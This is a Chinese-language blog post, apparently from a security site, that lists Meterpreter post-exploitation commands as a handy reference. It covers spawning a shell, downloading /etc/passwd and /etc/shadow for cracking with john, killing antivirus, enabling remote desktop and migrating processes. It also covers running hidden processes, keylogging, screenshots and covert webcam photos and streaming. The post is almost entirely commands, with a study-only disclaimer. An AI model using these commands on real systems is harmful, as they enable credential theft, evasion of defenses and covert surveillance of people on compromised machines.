说明
Meterpreter是一种后渗透工具,它强大的安全界无人不知,简直就是必备必学必用黑客工具。本文主要来说一下msf在后渗透中的常用命令(方便查询,故此记录)
常用命令
通过python获取可交互的shell
shell python3 -c 'import pty; pty.spawn("/bin/bash")'
下载目标密码(用 unshaow 混合 passwd和shadow 文件,再用john命令获得用户名密码)
download /etc/passwd 下载密码文件到home目录 download /etc/shadow
查看目标机的系统信息
sysinfo
查看目标鸡是否允许在虚拟机上
run post/windows/gather/checkvm
查看完整的网络连接
route
关闭杀毒软件
run post/windows/manage/killav
启动目标机的远程桌面协议,开启3389端口:
run post/windows/manage/enable_rdp
列举当前登陆过的用户
run post/windows/gather/enum_logged_on_users
进程迁移 先执行ps -ef查看进程
migrate 4686
列举安装的程序
run post/windows/gather/enum_applications
截屏
screenshot
键盘记录
keyscan_start:开启键盘记录功能 keyscan_dump:显示捕捉到的键盘记录信息 keyscan_stop:停止键盘记录功能
执行程序
execute -h 查看使用方法 -H:创建一个隐藏进程 -a:传递给命令的参数 -i:跟进程进行交互 -m:从内存中执行 -t:使用当前伪造的线程令牌运行进程 -s:在给定会话中执行进程 例:execute -f c:/temp/hello.exe
查看靶机是否有摄像头
webcam_list
打开靶机摄像头拍一张照片
webcam_snap
开启直播模式,抓取视频
webcam_stream
暂时就这些
更多请参考
来源:http://www.safe6.cn/
本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。
本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2019-08-23
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论